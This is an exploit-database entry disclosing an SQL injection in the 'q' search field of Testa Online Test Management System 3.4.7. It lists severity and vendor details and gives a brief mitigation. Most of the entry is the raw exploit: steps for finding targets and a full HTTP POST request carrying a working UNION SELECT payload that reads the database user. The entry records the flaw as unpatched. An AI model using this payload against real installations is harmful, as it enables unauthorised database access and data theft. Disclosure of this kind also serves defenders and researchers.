Testa Online Test Management System 3.4.7 - 'q' SQL Injection

vendor:

Testa Online Test Management System

by:

Ultra Security Team

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Testa Online Test Management System

Affected Version From: 3.4.7

Affected Version To: 3.4.7

Patch Exists: NO

Related CWE: N/A

CPE: a:testa:testa_online_test_management_system:3.4.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows/Linux

2020

Testa Online Test Management System 3.4.7 – ‘q’ SQL Injection

Testa Helps You To make Online Exams. An attacker can inject malicious payloads in the search field of the Testa Online Test Management System 3.4.7 to exploit the SQL Injection vulnerability.

Mitigation:

The best way to prevent this type of attack is to use parameterized queries.

Source

Exploit-DB raw data:

# Exploit Title: Testa Online Test Management System 3.4.7 - 'q' SQL Injection
# Date: 2020-07-21
# Google Dork: N/A
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://testa.cc
# Version: v3.4.7 
# Tested on: Windows/Linux
# CVE: N/A

.:: Description ::.
Testa Helps You To make Online Exams.

.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target Using Testa - Online Test Management System.
Step 2 - Click on List And Search Exams.
Step 3 - Inject Your Payloads in Search Field.

.:: Sample Request ::.
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost
Cookie: PHPSESSID=7eg4b3fl6vm8a11kmkh4pkq290; testa_user2=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

p=1&q=-1' UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 #